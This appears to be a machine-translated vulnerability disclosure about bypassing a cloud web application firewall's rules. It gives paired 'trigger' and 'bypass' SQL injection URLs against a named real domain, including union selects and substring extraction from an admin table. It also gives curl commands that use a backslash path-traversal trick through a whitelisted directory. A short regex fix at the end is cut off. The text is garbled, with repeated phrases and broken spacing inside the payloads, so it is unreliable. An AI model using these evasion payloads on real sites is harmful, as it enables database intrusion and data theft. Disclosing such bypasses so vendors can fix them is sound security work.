Several security rules Bypass

One pair of SQL parsing differences between reverse proxy and the real execution environment lead to two differences in file system-level parsing, leading to unencoded addresses. One pair of SQL-level parsing differences between reverse proxy and real execution environment two file system-level parsing differences lead to one SQL-level parsing difference resulting in judgment: http://www.anquanbao.com /? Id = 1 and (1 = 1) http://www.anquanbao.com /? Id = 1 and (1) = (1) http://www.anquanbao.com /? Http://www.anquanbao.com /? Id = 1 and true exploits: trigger: http://www.anquanbao.com /? Id = 1 and '1' = (select substr (user, 1,1) from admin limit 1) bypass: http://www.anquanbao.com /? Id = (1) and 'r' = (select (substr (user,) from admin limit 1) trigger: http://www.anquanbao.com /? Id = 1 union (select user from admin) bypass: http://www.anquanbao.com /? Id = (1) union (select (user) from admin) 2. Due to differences in file system parsing, the main cause is the differences in file system paths between windows and linux. The security Bao provides the White List function. If it is a windows host, you can use a whitelist to attack any page of the website. Here, the whitelist is triggered by the/test/directory: curl-v 'www. wtf. tk/Pages/Index. aspx? Id = 1 + and + 1 = 1' bypass: curl-v 'www. wtf. tk/test/.. \ Pages/Index. aspx? Id = 1 + and + 1 = 1'Solution:Improve the regular expression. It should be a regular expression '(? : And | or) \ d +...